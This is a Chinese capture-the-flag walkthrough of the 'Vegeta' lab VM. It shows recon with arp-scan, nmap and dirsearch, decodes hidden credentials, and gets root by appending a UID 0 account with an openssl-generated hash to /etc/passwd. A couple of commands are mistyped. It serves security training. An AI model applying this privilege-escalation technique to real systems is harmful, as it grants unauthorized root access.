打靶记录-Vegeta

前言

靶场难度:简单

环境:Virtualbox搭建

结果:取得 root 权限 + Flag

目标机和攻击机均为桥接模式

渗透过程

信息搜集

1
arp-scan -l

扫到目标机器ip地址为192.168.31.135

扫描开放端口

1
nmap -sV -A 192.168.31.135

image-20240617201410878

可以看到开放了22 和80端口

访问看看

image-20240617201456154

1
wegt http://192.168.31.135/vegeta1.jpg

下载图片下来,010并没发现什么

目录爆破

扫描一下目录

1
python3 -u http://192.168.31.135

image-20240617201857401

在img里发现一张图片

image-20240617201917348

看了看没啥东西,试试

1
robots.txt

里面有个find_me,

访问,源代码发现串base64

image-20240617202128650

赛博厨子解密得到一个二维码

image-20240617202238675

得到Password : topshellv

尝试连接ssh连接失败,

到这线索就断了,很懊恼,尝试更大的字典扫描目录

1
python3 dirsearch.py -r -u http://192.168.31.135/ -w /usr/share/SecLists-2024.2/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt 

我没有字典,该死的国内镜像源被关了,唉,只能自己手动下载了

https://github.com/danielmiessler/SecLists

跑了很久很久

直到跑出来/bulma

image-20240617204247239

将wav下载下来发现是个摩斯

https://morsecode.world/international/decoder/audio-decoder-expert.html

解密得到

用户名:trunks,密码:u$3r

image-20240617204403120

1
2
3
openssl passwd -1 -salt Q1ngchuan aa12345
echo 'Q1ngchuan:$1$Q1ngchua$K81XELmmJlrWEJBaq5c751:0:0:root:/root:/bin/bash' >> /etc/passwd
su Q1ngchuan

image-20240617205834958

中途在VirtualBox启动的没法粘贴复制

谈个shell到攻击机就好

总结

前面网段没调好,攻击机和目标机不再同一个网段没扫到,设置了虚拟机的NAT模式,ip网段设置成和主机一致192.168.31.0

或者都用同一个虚拟网卡也可以(虚拟机设置桥接模式选择虚拟网卡)